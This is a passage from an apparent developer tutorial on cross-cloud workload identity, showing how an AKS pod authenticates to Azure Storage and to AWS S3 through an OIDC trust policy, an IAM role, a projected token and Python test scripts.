&lt;/span&gt;        &lt;span class="n"&gt;containers&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;list&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;blob_service_client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;list_containers&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;

        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;✅ Azure Authentication successful!&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Found &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;containers&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; containers:&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;container&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;containers&lt;/span&gt;&lt;span class="p"&gt;[:&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;  &lt;span class="c1"&gt;# Limit display to first 5
&lt;/span&gt;            &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;  - &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;container&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;True&lt;/span&gt;
    &lt;span class="k"&gt;except&lt;/span&gt; &lt;span class="nb"&gt;Exception&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;❌ Azure Authentication failed: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;traceback&lt;/span&gt;
        &lt;span class="n"&gt;traceback&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;print_exc&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;False&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;__main__&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;test_azure_access&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;exit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Success logs:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;If the pod logs (&lt;code&gt;kubectl logs -f -n default aks-azure-test&lt;/code&gt;) look like the output below, the AKS-to-Azure authentication worked.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;✅ Azure Authentication successful!
Found 1 containers:
  - test-container
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
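&lt;p&gt;If the pod instead logs an authentication failure, a common cause is the webhook not mutating the pod (for example, a missing &lt;code&gt;azure.workload.identity/use&lt;/code&gt; label). A quick diagnostic, run inside the pod, is to check for the environment variables the workload identity webhook injects; the variable names below are based on the webhook's documentation, so treat this as a sketch rather than an official troubleshooting procedure.&lt;/p&gt;

```python
# Diagnostic sketch: the AKS workload identity webhook is expected to inject
# these variables into labeled pods; DefaultAzureCredential relies on them
# to perform the federated token exchange.
EXPECTED_VARS = [
    "AZURE_CLIENT_ID",
    "AZURE_TENANT_ID",
    "AZURE_FEDERATED_TOKEN_FILE",
    "AZURE_AUTHORITY_HOST",
]

def missing_workload_identity_vars(env):
    """Return the expected workload-identity variables absent from env."""
    return [name for name in EXPECTED_VARS if not env.get(name)]

if __name__ == "__main__":
    import os
    for name in missing_workload_identity_vars(os.environ):
        print(f"missing: {name}")
```

If any variable is reported missing, re-check the ServiceAccount annotation and the `azure.workload.identity/use` label before debugging the Azure side.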






&lt;h3&gt;
  
  
  2.2 Authenticating to AWS from AKS
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Cross-Cloud Authentication Flow:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpq7ebxymwqiuvfh7hqa6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpq7ebxymwqiuvfh7hqa6.png" alt="aks to aws" width="800" height="495"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Setup Steps:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# 1. Get AKS OIDC issuer&lt;/span&gt;
&lt;span class="nv"&gt;OIDC_ISSUER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az aks show &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--resource-group&lt;/span&gt; my-aks-rg &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; my-aks-cluster &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s2"&gt;"oidcIssuerProfile.issuerUrl"&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# Remove https:// prefix for IAM&lt;/span&gt;
&lt;span class="nv"&gt;OIDC_PROVIDER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="nv"&gt;$OIDC_ISSUER&lt;/span&gt; | &lt;span class="nb"&gt;sed&lt;/span&gt; &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="s2"&gt;"s/^https:&lt;/span&gt;&lt;span class="se"&gt;\/\/&lt;/span&gt;&lt;span class="s2"&gt;//"&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# 2. Create OIDC provider in AWS&lt;/span&gt;
&lt;span class="nb"&gt;export &lt;/span&gt;&lt;span class="nv"&gt;AWS_PROFILE&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&amp;lt;AWS profile where the OIDC provider should be created&amp;gt;

&lt;span class="c"&gt;# Extract just the hostname from OIDC_ISSUER&lt;/span&gt;
&lt;span class="nv"&gt;OIDC_HOST&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="nv"&gt;$OIDC_ISSUER&lt;/span&gt; | &lt;span class="nb"&gt;sed&lt;/span&gt; &lt;span class="s1"&gt;'s|https://||'&lt;/span&gt; | &lt;span class="nb"&gt;sed&lt;/span&gt; &lt;span class="s1"&gt;'s|/.*||'&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# Get the thumbprint&lt;/span&gt;
&lt;span class="nv"&gt;THUMBPRINT&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; | openssl s_client &lt;span class="nt"&gt;-servername&lt;/span&gt; &lt;span class="nv"&gt;$OIDC_HOST&lt;/span&gt; &lt;span class="nt"&gt;-connect&lt;/span&gt; &lt;span class="nv"&gt;$OIDC_HOST&lt;/span&gt;:443 &lt;span class="nt"&gt;-showcerts&lt;/span&gt; 2&amp;gt;/dev/null &lt;span class="se"&gt;\&lt;/span&gt;
  | openssl x509 &lt;span class="nt"&gt;-fingerprint&lt;/span&gt; &lt;span class="nt"&gt;-sha1&lt;/span&gt; &lt;span class="nt"&gt;-noout&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  | &lt;span class="nb"&gt;sed&lt;/span&gt; &lt;span class="s1"&gt;'s/SHA1 Fingerprint=//;s/://g'&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# Create the OIDC provider&lt;/span&gt;
aws iam create-open-id-connect-provider &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--url&lt;/span&gt; &lt;span class="nv"&gt;$OIDC_ISSUER&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--client-id-list&lt;/span&gt; sts.amazonaws.com &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--thumbprint-list&lt;/span&gt; &lt;span class="nv"&gt;$THUMBPRINT&lt;/span&gt;

&lt;span class="c"&gt;# 3. Create trust policy&lt;/span&gt;
&lt;span class="nv"&gt;YOUR_AWS_ACCOUNT_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;aws sts get-caller-identity | jq &lt;span class="nt"&gt;-r&lt;/span&gt; .Account&lt;span class="si"&gt;)&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; aks-aws-trust-policy.json &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt;
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;YOUR_AWS_ACCOUNT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;:oidc-provider/&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_PROVIDER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"
      },
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": {
        "StringEquals": {
          "&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_PROVIDER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;:sub": "system:serviceaccount:default:aks-cross-cloud-sa",
          "&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_PROVIDER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;:aud": "sts.amazonaws.com"
        }
      }
    }
  ]
}
&lt;/span&gt;&lt;span class="no"&gt;EOF

&lt;/span&gt;&lt;span class="c"&gt;# 4. Create IAM role&lt;/span&gt;
aws iam create-role &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role-name&lt;/span&gt; aks-to-aws-role &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--assume-role-policy-document&lt;/span&gt; file://aks-aws-trust-policy.json

&lt;span class="c"&gt;# 5. Attach permissions&lt;/span&gt;
aws iam attach-role-policy &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role-name&lt;/span&gt; aks-to-aws-role &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--policy-arn&lt;/span&gt; arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
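&lt;p&gt;The trust-policy heredoc above can equivalently be generated programmatically, which makes it easier to keep the two condition keys (&lt;code&gt;:sub&lt;/code&gt; and &lt;code&gt;:aud&lt;/code&gt;) consistent with the ServiceAccount from Scenario 2.1. The sketch below mirrors the heredoc; the account ID and issuer URL are placeholder examples, not real values.&lt;/p&gt;

```python
import json

def aks_trust_policy(account_id: str, oidc_issuer: str,
                     namespace: str, service_account: str) -> dict:
    """Build an IAM trust policy for AssumeRoleWithWebIdentity from an AKS OIDC issuer."""
    # IAM condition keys use the issuer without the https:// prefix,
    # matching the sed step in the shell script above.
    provider = oidc_issuer.removeprefix("https://")
    return {
        "Version": "2012-10-17",
        "Statement": [{
            "Effect": "Allow",
            "Principal": {
                "Federated": f"arn:aws:iam::{account_id}:oidc-provider/{provider}"
            },
            "Action": "sts:AssumeRoleWithWebIdentity",
            "Condition": {"StringEquals": {
                f"{provider}:sub": f"system:serviceaccount:{namespace}:{service_account}",
                f"{provider}:aud": "sts.amazonaws.com",
            }},
        }],
    }

# Placeholder values for illustration only.
policy = aks_trust_policy("123456789012",
                          "https://eastus2.oic.prod-aks.azure.com/TENANT/ISSUER/",
                          "default", "aks-cross-cloud-sa")
print(json.dumps(policy, indent=2))
```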



&lt;p&gt;&lt;strong&gt;Kubernetes Manifest:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Apply the manifest below to validate Scenario 2.2. If authentication is working, you will see the success logs shown further down.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# scenario2-2-aks-to-aws.yaml&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pod&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aks-aws-test&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="c1"&gt;# the aks-cross-cloud-sa ServiceAccount was created in Scenario 2.1&lt;/span&gt;
  &lt;span class="na"&gt;serviceAccountName&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aks-cross-cloud-sa&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aws-test&lt;/span&gt;
      &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;python:3.11-slim&lt;/span&gt;
      &lt;span class="na"&gt;command&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;sh'&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;-c'&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;pip&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;install&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;boto3&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;&amp;amp;&amp;amp;&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;python&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;/app/test_aws_from_aks.py'&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
      &lt;span class="na"&gt;env&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;AWS_ROLE_ARN&lt;/span&gt;
          &lt;span class="c1"&gt;# replace YOUR_AWS_ACCOUNT_ID with the AWS account ID in which you created the IAM role&lt;/span&gt;
          &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;arn:aws:iam::YOUR_AWS_ACCOUNT_ID:role/aks-to-aws-role"&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;AWS_WEB_IDENTITY_TOKEN_FILE&lt;/span&gt;
          &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/var/run/secrets/aws/tokens/aws-token&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;AWS_REGION&lt;/span&gt;
          &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;us-east-1&lt;/span&gt;
      &lt;span class="na"&gt;volumeMounts&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-code&lt;/span&gt;
          &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/app&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aws-token&lt;/span&gt;
          &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/var/run/secrets/aws/tokens&lt;/span&gt;
          &lt;span class="na"&gt;readOnly&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-code&lt;/span&gt;
      &lt;span class="na"&gt;configMap&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aws-test-code-aks&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aws-token&lt;/span&gt;
      &lt;span class="na"&gt;projected&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;sources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;serviceAccountToken&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
              &lt;span class="na"&gt;path&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aws-token&lt;/span&gt;
              &lt;span class="na"&gt;expirationSeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;3600&lt;/span&gt;
              &lt;span class="na"&gt;audience&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;sts.amazonaws.com&lt;/span&gt;
&lt;span class="nn"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ConfigMap&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aws-test-code-aks&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;data&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;test_aws_from_aks.py&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
    &lt;span class="s"&gt;# Code below&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Important Note:&lt;/strong&gt; We use &lt;code&gt;sts.amazonaws.com&lt;/code&gt; as the audience for AWS authentication, which is the AWS best practice. This creates a dedicated token specifically for AWS, separate from the Azure token used in Scenario 2.1.&lt;/p&gt;
&lt;/blockquote&gt;
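&lt;p&gt;If AWS rejects the token with an audience-related error, it helps to inspect the &lt;code&gt;aud&lt;/code&gt; claim of the projected token directly. The sketch below decodes a JWT payload without verifying the signature (debugging only); the sample token is hand-built for illustration, whereas in the pod you would read the real token from &lt;code&gt;/var/run/secrets/aws/tokens/aws-token&lt;/code&gt;.&lt;/p&gt;

```python
import base64
import json

def jwt_payload(token: str) -> dict:
    """Decode a JWT's payload segment WITHOUT verifying it (debugging only)."""
    segment = token.split(".")[1]
    segment += "=" * (-len(segment) % 4)  # restore stripped base64 padding
    return json.loads(base64.urlsafe_b64decode(segment))

def _b64(obj) -> str:
    """Encode a dict as an unpadded base64url JWT segment."""
    return base64.urlsafe_b64encode(json.dumps(obj).encode()).rstrip(b"=").decode()

# Hand-built, unsigned sample token (illustration only).
sample = ".".join([
    _b64({"alg": "none"}),
    _b64({"aud": ["sts.amazonaws.com"],
          "sub": "system:serviceaccount:default:aks-cross-cloud-sa"}),
    "",
])
print(jwt_payload(sample)["aud"])  # ['sts.amazonaws.com']
```

The `aud` value must match both the `audience` in the projected volume and the `:aud` condition in the IAM trust policy.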

&lt;p&gt;&lt;strong&gt;Test Code (Python):&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# test_aws_from_aks.py
&lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;boto3&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;sys&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;test_aws_access&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;Test AWS S3 access from AKS using Web Identity&lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
    &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="c1"&gt;# boto3 automatically uses AWS_WEB_IDENTITY_TOKEN_FILE and AWS_ROLE_ARN
&lt;/span&gt;        &lt;span class="n"&gt;s3_client&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;boto3&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;client&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;s3&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# List buckets
&lt;/span&gt;        &lt;span class="n"&gt;response&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;s3_client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;list_buckets&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;✅ AWS Authentication successful!&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Found &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Buckets&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; S3 buckets:&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;bucket&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Buckets&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;][:&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;
